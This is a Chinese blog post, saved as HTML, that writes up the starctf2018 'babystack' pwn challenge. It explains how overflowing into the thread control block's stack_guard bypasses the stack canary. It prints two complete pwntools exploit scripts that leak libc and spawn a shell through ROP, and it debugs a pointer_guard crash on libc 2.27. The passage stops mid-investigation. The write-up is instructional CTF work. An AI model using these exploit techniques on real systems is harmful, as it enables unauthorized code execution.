<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="记录一个bypass canary的题目，以及其延伸出来的一大堆知识和大坑">
<meta property="og:type" content="article">
<meta property="og:title" content="bypass Canary">
<meta property="og:url" content="http://yoursite.com/2020/11/11/bypass-Canary/index.html">
<meta property="og:site_name">
<meta property="og:description" content="记录一个bypass canary的题目，以及其延伸出来的一大堆知识和大坑">
<meta property="og:image" content="http://yoursite.com/img/bypass-Canary/enter_system.png">
<meta property="og:image" content="http://yoursite.com/img/bypass-Canary/rax_gg.png">
<meta property="og:image" content="http://yoursite.com/img/bypass-Canary/also_gg.png">
<meta property="og:image" content="http://yoursite.com/img/bypass-Canary/wired.png">
<meta property="og:image" content="http://yoursite.com/img/bypass-Canary/pid_gg.png">
<meta property="og:image" content="http://yoursite.com/img/bypass-Canary/pid_not_gg.png">
<meta property="og:image" content="http://yoursite.com/img/bypass-Canary/start_system.png">
<meta property="og:image" content="http://yoursite.com/img/bypass-Canary/alignment.png">
<meta property="og:image" content="http://yoursite.com/img/bypass-Canary/after_align.png">
<meta property="og:image" content="http://yoursite.com/img/bypass-Canary/clone_successfuly.png">
<meta property="og:image" content="http://yoursite.com/img/bypass-Canary/pwn.png">
<meta property="article:published_time" content="2020-11-11T10:19:56.000Z">
<meta property="article:modified_time" content="2020-11-12T10:47:11.822Z">
<meta property="article:author" content="ph4ntom">
<meta property="article:tag" content="binary">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/img/bypass-Canary/enter_system.png">

<link rel="canonical" href="http://yoursite.com/2020/11/11/bypass-Canary/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-Hans'
  };
</script>

  <title>bypass Canary | </title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title"></h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/11/11/bypass-Canary/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="ph4ntom">
      <meta itemprop="description" content="The wheel turns,nothing is ever new">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          bypass Canary
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-11-11 18:19:56" itemprop="dateCreated datePublished" datetime="2020-11-11T18:19:56+08:00">2020-11-11</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-11-12 18:47:11" itemprop="dateModified" datetime="2020-11-12T18:47:11+08:00">2020-11-12</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>记录一个bypass canary的题目，以及其延伸出来的一大堆知识和大坑</p>
<a id="more"></a>

<h1 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h1><p>这道题是来自starctf2018的一道pwn题，主要是通过覆盖TCB结构体中的stack_guard值来bypass Canary的校验过程</p>
<p>赛题链接:  <a href="https://github.com/sixstars/starctf2018/tree/master/pwn-babystack" target="_blank" rel="noopener">https://github.com/sixstars/starctf2018/tree/master/pwn-babystack</a></p>
<p>TCB介绍: <a href="http://www.openwall.com/lists/oss-security/2018/02/27/5" target="_blank" rel="noopener">http://www.openwall.com/lists/oss-security/2018/02/27/5</a></p>
<h1 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h1><ul>
<li>Ubuntu 18.04</li>
<li>libc-2.27</li>
</ul>
<h1 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h1><p>由于大致了解解题细节，所以我就直接拿现成的exp来先运行试一下，如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line">#!&#x2F;usr&#x2F;bin&#x2F;python</span><br><span class="line"></span><br><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">context.os &#x3D; &#39;linux&#39;</span><br><span class="line">context.terminal &#x3D; [&#39;tmux&#39;, &#39;splitw&#39;, &#39;-h&#39;]</span><br><span class="line"># [&#39;CRITICAL&#39;, &#39;DEBUG&#39;, &#39;ERROR&#39;, &#39;INFO&#39;, &#39;NOTSET&#39;, &#39;WARN&#39;, &#39;WARNING&#39;]</span><br><span class="line">context.log_level &#x3D; &#39;INFO&#39;</span><br><span class="line"></span><br><span class="line">libc_path &#x3D; &#39;&#x2F;lib&#x2F;x86_64-linux-gnu&#x2F;libc.so.6&#39;</span><br><span class="line">bin_path &#x3D; &#39;.&#x2F;bs&#39;</span><br><span class="line"></span><br><span class="line">libc &#x3D; ELF(libc_path)</span><br><span class="line">binary &#x3D; ELF(bin_path)</span><br><span class="line"></span><br><span class="line">host &#x3D; &#39;&#39;</span><br><span class="line">port &#x3D; 6666</span><br><span class="line"></span><br><span class="line">def debug(command&#x3D;&#39;&#39;):</span><br><span class="line">    gdb.attach(p, command)</span><br><span class="line"></span><br><span class="line">def exploit():</span><br><span class="line">    #debug(&#39;b *0x4009E7\n&#39;)</span><br><span class="line">    g &#x3D; lambda x: next(binary.search(asm(x, os&#x3D;&#39;linux&#39;, arch&#x3D;&#39;amd64&#39;)))</span><br><span class="line">    pop_rdi &#x3D; g(&#39;pop rdi; ret&#39;)</span><br><span class="line">    pop_rsi_pop &#x3D; g(&#39;pop rsi; pop r15; ret&#39;)</span><br><span class="line">    leave &#x3D; g(&#39;leave; ret&#39;)</span><br><span class="line">    log.info(&quot;pop_rdi:     &quot; + hex(pop_rdi))</span><br><span class="line">    log.info(&quot;pop_rsi_pop: &quot; + hex(pop_rsi_pop))</span><br><span class="line">    log.info(&quot;leave:       &quot; + hex(leave))</span><br><span class="line"></span><br><span class="line">    size &#x3D; 8300</span><br><span class="line">    p.sendlineafter(&#39;send?\n&#39;, str(size))</span><br><span class="line"></span><br><span class="line">    fakebuf &#x3D; 0x602f00</span><br><span class="line">    payload &#x3D; &#39;&#39;</span><br><span class="line">    payload +&#x3D; &#39;A&#39;*0x1010</span><br><span class="line">    # stack pivot #step 1</span><br><span class="line">    payload +&#x3D; p64(fakebuf)</span><br><span class="line">    # ROP1 - leak libc </span><br><span class="line">    payload +&#x3D; p64(pop_rdi)</span><br><span class="line">    payload +&#x3D; p64(binary.got[&#39;puts&#39;])</span><br><span class="line">    payload +&#x3D; p64(binary.plt[&#39;puts&#39;])</span><br><span class="line">    # ROP2 - read </span><br><span class="line">    payload +&#x3D; p64(pop_rdi)</span><br><span class="line">    payload +&#x3D; p64(0)</span><br><span class="line">    payload +&#x3D; p64(pop_rsi_pop)</span><br><span class="line">    payload +&#x3D; p64(fakebuf)</span><br><span class="line">    payload +&#x3D; p64(0)</span><br><span class="line">    payload +&#x3D; p64(binary.plt[&#39;read&#39;])</span><br><span class="line">    # stack pivot #step 2</span><br><span class="line">    payload +&#x3D; p64(leave)</span><br><span class="line">   	# Override TCB Canary</span><br><span class="line">    payload &#x3D; payload.ljust(size, &#39;A&#39;)</span><br><span class="line">    </span><br><span class="line">    p.send(payload)</span><br><span class="line">    p.recvuntil(&#39;goodbye.\n&#39;)</span><br><span class="line">    leak &#x3D; p.recvline().strip()[-6:].ljust(8, &#39;\0&#39;)</span><br><span class="line">    leak &#x3D; u64(leak)</span><br><span class="line">    libc.address &#x3D; leak - libc.sym[&#39;puts&#39;]</span><br><span class="line">    info(&quot;%#x&quot;, libc.address)</span><br><span class="line">    bin_sh &#x3D; libc.search(&#39;&#x2F;bin&#x2F;sh&#39;).next()</span><br><span class="line">    system &#x3D; libc.sym[&#39;system&#39;]</span><br><span class="line">    </span><br><span class="line">    payload &#x3D; &#39;&#39;</span><br><span class="line">    payload +&#x3D; p64(0)</span><br><span class="line">    payload +&#x3D; p64(pop_rdi)</span><br><span class="line">    payload +&#x3D; p64(bin_sh)</span><br><span class="line">    payload +&#x3D; p64(system)</span><br><span class="line"></span><br><span class="line">    p.send(payload)</span><br><span class="line">    p.interactive()</span><br><span class="line"></span><br><span class="line">if __name__ &#x3D;&#x3D; &#39;__main__&#39;:</span><br><span class="line">    if len(sys.argv) &#x3D;&#x3D; 1:</span><br><span class="line">        global p</span><br><span class="line">        p &#x3D; process(executable&#x3D;bin_path, argv&#x3D;[bin_path]) #, env&#x3D;&#123;&#39;LD_PRELOAD&#39;:libc_path&#125;)</span><br><span class="line">    else:</span><br><span class="line">        p &#x3D; remote(sys.argv[1], int(sys.argv[2]))</span><br><span class="line">    exploit()</span><br></pre></td></tr></table></figure>

<p>这里我没有使用官方的libc(主要是我没找到。。)，直接使用了系统的libc</p>
<p>主要的过程在注释里写的差不多了，大致上就是</p>
<ul>
<li>计算偏移，先填充0x1010个“A”至rbp(这一步同时覆盖了栈上的Canary为“AAAA”)</li>
<li>stack pivot劫持rbp至.bss段</li>
<li>由于libc默认PIE，所以需要调用puts函数leak出puts函数在got表的绝对地址</li>
<li>寻找pop_rsi_pop、pop_rdi等一系列gadget，控制寄存器，准备调用read函数的参数</li>
<li>根据puts leak出的puts函数在got表的绝对地址，计算偏移得到libc的基地址，并基于libc的基地址算出read函数的绝对地址</li>
<li>构造ROP，用“A”填充ROP至8300个字节(这一步同时利用超长的“A”，覆盖了TCB中的stack_guard值为“AAAA”，从而绕过Canary的校验)</li>
<li>将ROP填入栈上对应位置</li>
<li>在我们填入的read函数被调用时，将真正的exp通过read函数写入.bss上被劫持的栈</li>
<li>最后leave，将栈完全劫持到.bss段执行</li>
</ul>
<p>过程还是比较明了的，于是我运行了一下</p>
<p>然而，这个exp在我的机器上并不能成功的getshell，但是，在ubuntu 16.04上却可以成功getshell。</p>
<p>疑惑.jpg，话不多说，gdb搞起</p>
<h1 id="WHY"><a href="#WHY" class="headerlink" title="WHY?"></a>WHY?</h1><p>gdb单步调试至我们最终执行的payload处</p>
<p>首先，可以看到程序确实被劫持到了system函数，并且rdi确实指向了“/bin/sh”字符串</p>
<p><img src="/img/bypass-Canary/enter_system.png" alt="enter_system"></p>
<p>看上去一切正常，继续跟进去看看</p>
<p>当我调试到这一步时，程序崩溃了</p>
<p><img src="/img/bypass-Canary/rax_gg.png" alt="rax_gg"></p>
<p>可以看到，<code>&lt;do_system+359&gt; call rax</code>尝试调用rax寄存器所指向的函数</p>
<p>但仔细看一下rax的值，可以发现为0x74e75a79b3d1d1ee，远远超出了可以访问的内存地址空间</p>
<p>所以自然而然的，程序在此崩溃</p>
<p>那么为什么会出现这么异常的rax值呢？</p>
<p>我把目光放在了前面的一段汇编代码上，即<code>&lt;do_system+343&gt; xor rax, QWORD PTR fs:0x30</code> </p>
<p>我将<code>0x74e75a79b3d1d1ee</code>与xor之前的rax的值<code>0x35a61b38f29090af</code>进行xor，得到了<code>fs:0x30</code>的值为<code>0x4141414141414141</code></p>
<p>看到这，可能有人还是不理解，这里贴一下TCB的结构</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">typedef struct</span><br><span class="line">&#123;</span><br><span class="line">  void *tcb;                &#x2F;* Pointer to the TCB.  Not necessarily the</span><br><span class="line">                           thread descriptor used by libpthread.  *&#x2F;</span><br><span class="line">  dtv_t *dtv;</span><br><span class="line">  void *self;                &#x2F;* Pointer to the thread descriptor.  *&#x2F;</span><br><span class="line">  int multiple_threads;</span><br><span class="line">  int gscope_flag;</span><br><span class="line">  uintptr_t sysinfo;</span><br><span class="line">  uintptr_t stack_guard;</span><br><span class="line">  uintptr_t pointer_guard;</span><br><span class="line">  unsigned long int vgetcpu_cache[2];</span><br><span class="line">  &#x2F;* Bit 0: X86_FEATURE_1_IBT.</span><br><span class="line">     Bit 1: X86_FEATURE_1_SHSTK.</span><br><span class="line">   *&#x2F;</span><br><span class="line">  unsigned int feature_1;</span><br><span class="line">  int __glibc_unused1;</span><br><span class="line">  &#x2F;* Reservation of some values for the TM ABI.  *&#x2F;</span><br><span class="line">  void *__private_tm[4];</span><br><span class="line">  &#x2F;* GCC split stack support.  *&#x2F;</span><br><span class="line">  void *__private_ss;</span><br><span class="line">  &#x2F;* The lowest address of shadow stack,  *&#x2F;</span><br><span class="line">  unsigned long long int ssp_base;</span><br><span class="line">  &#x2F;* Must be kept even if it is no longer used by glibc since programs,</span><br><span class="line">     like AddressSanitizer, depend on the size of tcbhead_t.  *&#x2F;</span><br><span class="line">  __128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));</span><br><span class="line">  void *__padding[8];</span><br><span class="line">&#125; tcbhead_t;</span><br></pre></td></tr></table></figure>



<p>看到这儿想必大家也知道了原因，由于<code>fs:0x28</code>处就是stack_guard，而原payload在没有计算任何偏移的情况下暴力覆盖了8300个字节，在覆盖stack_guard的同时也将<code>fs:0x30</code>处的pointer_guard覆盖为了<code>0x4141414141414141</code>而在libc2.27中的system函数在实现过程中需要利用这个值做指针的校验，于是便触发了崩溃。</p>
<p>那要解决这个问题其实很简单，我们可以看到，<code>stack_guard</code>在相对于<code>pointer_guard</code>的低位，所以我们只需要精确计算出需要覆盖的偏移量，仅覆盖至<code>stack_guard</code>即可</p>
<p>通过命令<code>x/32gx pthread_self()</code>我查看到了TCB的结构以及其地址，确定了<code>stack_guard</code>与溢出点<code>buf</code>之间的偏移</p>
<p>TIPS：在gdb中，你是无法直接查看到fs寄存器指向的地址的，因为其引用的TCB结构只有当前线程才可以访问，所以要借助<code>x/32gx pthread_self()</code>来访问，而各类gdb插件所显示的fs都是0x0，是不正确的</p>
<p>此时修改exp如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br></pre></td><td class="code"><pre><span class="line">#!&#x2F;usr&#x2F;bin&#x2F;python</span><br><span class="line"></span><br><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">context.os &#x3D; &#39;linux&#39;</span><br><span class="line">#context.terminal &#x3D; [&#39;tmux&#39;, &#39;splitw&#39;, &#39;-h&#39;]</span><br><span class="line"># [&#39;CRITICAL&#39;, &#39;DEBUG&#39;, &#39;ERROR&#39;, &#39;INFO&#39;, &#39;NOTSET&#39;, &#39;WARN&#39;, &#39;WARNING&#39;]</span><br><span class="line">context.log_level &#x3D; &#39;DEBUG&#39;</span><br><span class="line"></span><br><span class="line">libc_path &#x3D; &#39;&#x2F;lib&#x2F;x86_64-linux-gnu&#x2F;libc.so.6&#39;</span><br><span class="line">bin_path &#x3D; &#39;.&#x2F;bs&#39;</span><br><span class="line"></span><br><span class="line">libc &#x3D; ELF(libc_path)</span><br><span class="line">binary &#x3D; ELF(bin_path)</span><br><span class="line"></span><br><span class="line">host &#x3D; &#39;&#39;</span><br><span class="line">port &#x3D; 6666</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def debug(command&#x3D;&#39;&#39;):</span><br><span class="line">    gdb.attach(p, command)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def exploit():</span><br><span class="line">    # debug(&#39;b *0x4009E7\n&#39;)</span><br><span class="line">    g &#x3D; lambda x: next(binary.search(asm(x, os&#x3D;&#39;linux&#39;, arch&#x3D;&#39;amd64&#39;)))</span><br><span class="line">    pop_rdi &#x3D; g(&#39;pop rdi; ret&#39;)</span><br><span class="line">    pop_rsi_pop &#x3D; g(&#39;pop rsi; pop r15; ret&#39;)</span><br><span class="line">    leave &#x3D; g(&#39;leave; ret&#39;)</span><br><span class="line">    </span><br><span class="line">    log.info(&quot;pop_rdi:     &quot; + hex(pop_rdi))</span><br><span class="line">    log.info(&quot;pop_rsi_pop: &quot; + hex(pop_rsi_pop))</span><br><span class="line">    log.info(&quot;leave:       &quot; + hex(leave))</span><br><span class="line"></span><br><span class="line">    size &#x3D; 0x1850</span><br><span class="line">    p.sendlineafter(&#39;send?\n&#39;, str(size))</span><br><span class="line"></span><br><span class="line">    fakebuf &#x3D; 0x602f00</span><br><span class="line">    payload &#x3D; &#39;&#39;</span><br><span class="line">    payload +&#x3D; &#39;A&#39; * 0x1010</span><br><span class="line">    # stack pivot #step 1</span><br><span class="line">    payload +&#x3D; p64(fakebuf)</span><br><span class="line">    # ROP1 - leak libc</span><br><span class="line">    payload +&#x3D; p64(pop_rdi)</span><br><span class="line">    payload +&#x3D; p64(binary.got[&#39;puts&#39;])</span><br><span class="line">    payload +&#x3D; p64(binary.plt[&#39;puts&#39;])</span><br><span class="line">    # ROP2 - read</span><br><span class="line">    payload +&#x3D; p64(pop_rdi)</span><br><span class="line">    payload +&#x3D; p64(0)</span><br><span class="line">    payload +&#x3D; p64(pop_rsi_pop)</span><br><span class="line">    payload +&#x3D; p64(fakebuf)</span><br><span class="line">    payload +&#x3D; p64(0)</span><br><span class="line">    payload +&#x3D; p64(binary.plt[&#39;read&#39;])</span><br><span class="line">    # stack pivot #step 2</span><br><span class="line">    payload +&#x3D; p64(leave)</span><br><span class="line">    # Override TCB Canary</span><br><span class="line">    payload &#x3D; payload.ljust(size, &#39;A&#39;)</span><br><span class="line">    #print(&quot;pid &quot; + str(proc.pidof(p)))</span><br><span class="line">    #raw_input(&quot;attach me&quot;)</span><br><span class="line">    p.send(payload)</span><br><span class="line">    #print(&quot;pid &quot; + str(proc.pidof(p)))</span><br><span class="line">    #raw_input(&quot;attach me&quot;)</span><br><span class="line">    p.recvuntil(&#39;goodbye.\n&#39;)</span><br><span class="line">    leak &#x3D; p.recv(6)+&#39;\x00\x00&#39;</span><br><span class="line">    leak &#x3D; u64(leak)</span><br><span class="line">    #info(&quot;libc.address is %#x&quot;, libc.address)</span><br><span class="line">    #print(&quot;leak:&quot;, leak)</span><br><span class="line">    #print(&quot;sym:&quot;, libc.symbols[&#39;puts&#39;])</span><br><span class="line">    libc.address &#x3D; leak - libc.symbols[&#39;puts&#39;]</span><br><span class="line"></span><br><span class="line">    #print(&quot;leak:&quot;,leak)</span><br><span class="line">    #print(&quot;sym:&quot;,libc.symbols[&#39;puts&#39;])</span><br><span class="line">    info(&quot;libc.address is %#x&quot;, libc.address)</span><br><span class="line">    bin_sh &#x3D; libc.search(&#39;&#x2F;bin&#x2F;sh&#39;).next()</span><br><span class="line">    system &#x3D; libc.sym[&#39;system&#39;]</span><br><span class="line"></span><br><span class="line">    #payload &#x3D; &#39;&#39;</span><br><span class="line">    #payload +&#x3D; p64(0)</span><br><span class="line">    #payload +&#x3D; p64((libc.address+0x4f3c2))</span><br><span class="line">    payload &#x3D; &#39;&#39;</span><br><span class="line">    payload +&#x3D; p64(0)</span><br><span class="line">    payload +&#x3D; p64(pop_rdi)</span><br><span class="line">    payload +&#x3D; p64(bin_sh)</span><br><span class="line">    payload +&#x3D; p64(system)</span><br><span class="line"></span><br><span class="line">    p.send(payload)</span><br><span class="line">    #print (&quot;pid &quot; + str(proc.pidof(p)))</span><br><span class="line">    #raw_input(&quot;attach me&quot;)</span><br><span class="line">    p.interactive()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ &#x3D;&#x3D; &#39;__main__&#39;:</span><br><span class="line">    if len(sys.argv) &#x3D;&#x3D; 1:</span><br><span class="line">        global p</span><br><span class="line">        p &#x3D; process(executable&#x3D;bin_path, argv&#x3D;[bin_path])  # , env&#x3D;&#123;&#39;LD_PRELOAD&#39;:libc_path&#125;)</span><br><span class="line">    else:</span><br><span class="line">        p &#x3D; remote(sys.argv[1], int(sys.argv[2]))</span><br><span class="line">    exploit()</span><br></pre></td></tr></table></figure>



<p>修改了payload的长度，仅覆盖至<code>stack_guard</code>即可</p>
<p>本以为大功告成，可是事与愿违，当我再次运行exp时，仍然抛出了错误</p>
<p>我:????????</p>
<p>本以为是改的不对，计算错了偏移量，但是当我再一次gdb调试后，发现原来的错误处已经正常</p>
<p><img src="/img/bypass-Canary/also_gg.png" alt="also_gg"></p>
<p>那就很奇怪了，为什么还是不行呢？</p>
<p>继续调试，同时我写了一个正常调用system函数的代码做对比</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;errno.h&gt;</span><br><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;pthread.h&gt;</span><br><span class="line">#include &lt;asm&#x2F;prctl.h&gt;</span><br><span class="line">#include &lt;sys&#x2F;prctl.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line">#include &lt;stdlib.h&gt;</span><br><span class="line">#include &lt;unistd.h&gt;</span><br><span class="line"></span><br><span class="line">void * start()&#123;</span><br><span class="line"> getchar();</span><br><span class="line"> system(&quot;&#x2F;bin&#x2F;sh&quot;);</span><br><span class="line"> return 0;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">int main()</span><br><span class="line">&#123;</span><br><span class="line">    pthread_t t;</span><br><span class="line">    pthread_create(&amp;t, NULL, &amp;start, 0);</span><br><span class="line">    if (pthread_join(t, NULL) !&#x3D; 0) &#123;</span><br><span class="line">        puts(&quot;exit failure&quot;);</span><br><span class="line">        return 1;</span><br><span class="line">    &#125;</span><br><span class="line">    puts(&quot;Bye bye&quot;);</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>经过长时间的调试，我发现了奇怪的地方</p>
